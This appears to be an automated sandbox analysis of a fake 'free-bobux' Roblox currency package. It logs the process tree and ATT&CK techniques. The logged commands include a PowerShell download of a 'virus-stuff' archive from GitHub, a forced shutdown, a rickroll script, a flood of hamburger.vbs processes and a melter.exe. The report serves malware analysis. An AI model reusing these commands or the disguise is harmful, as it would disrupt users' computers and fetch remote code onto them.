  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\534B.tmp\534C.tmp\534D.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  PID:8560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:8584
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\rickroll.vbs"
    3⤵
    - Checks computer location settings
    PID:9092
  - - C:\Windows\System32\SndVol.exe
      "C:\Windows\System32\SndVol.exe"
      4⤵
      PID:9168
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/watch?v=dQw4w9WgXcQ
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:6940
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffa802cc40,0x7fffa802cc4c,0x7fffa802cc58
        5⤵
        
        PID:7752
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1852,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1848 /prefetch:2
        5⤵
        
        PID:6152
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2192 /prefetch:3
        5⤵
        
        PID:6272
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2256 /prefetch:8
        5⤵
        
        PID:6796
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3152 /prefetch:1
        5⤵
        
        PID:9268
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3216 /prefetch:1
        5⤵
        
        PID:9276
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4528 /prefetch:1
        5⤵
        
        PID:9828
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4508,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4712 /prefetch:8
        5⤵
        
        PID:10040
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4380,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4420 /prefetch:8
        5⤵
        Modifies registry class
        
        PID:7616
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5272,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5284 /prefetch:8
        5⤵
        
        PID:10036
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5288,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5372 /prefetch:8
        5⤵
        
        PID:11964
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:9108
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\shutdown.vbs"
    3⤵
    - Checks computer location settings
    PID:9244
  - - C:\Windows\System32\shutdown.exe
      "C:\Windows\System32\shutdown.exe" -s -t 60
      4⤵
      PID:9676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K start.cmd
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    PID:4204
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9896
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9964
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9944
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10004
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10052
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10148
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10184
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10212
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10228
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9108
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7684
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9680
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10120
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10256
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10292
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10320
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10332
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10360
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10404
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10424
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10444
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10464
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10528
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10564
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10600
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10620
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10660
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10700
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10728
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10748
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10784
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10804
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10844
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10860
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10900
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10928
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10944
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10968
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11016
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11080
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11100
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11140
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11168
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11184
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11212
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11244
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10492
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10588
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9588
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11048
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11056
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3784
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9804
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:9520
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11332
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11352
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11392
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11416
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11472
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11504
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11528
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11568
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11588
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11616
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11640
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11680
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11700
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11764
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11788
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11820
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11876
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11904
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:11936
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12008
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12048
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12096
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12124
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12152
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12180
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12208
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12256
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7616
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10156
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:10036
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4036
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3828
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12216
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5468
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3664
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5564
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3532
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3728
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:2012
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3652
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12332
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12392
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12420
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12448
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12468
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12492
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12532
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12552
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12588
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12604
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12644
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12672
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12736
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12756
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12792
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12820
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:12868
- - C:\Windows\system32\timeout.exe
    timeout /t 20 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:9440
- - C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exe
    melter.exe
    3⤵
    PID:13120

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x52c 0x470
1⤵
PID:4084

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:9404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:12292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:12348

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3fe9855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:11240

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery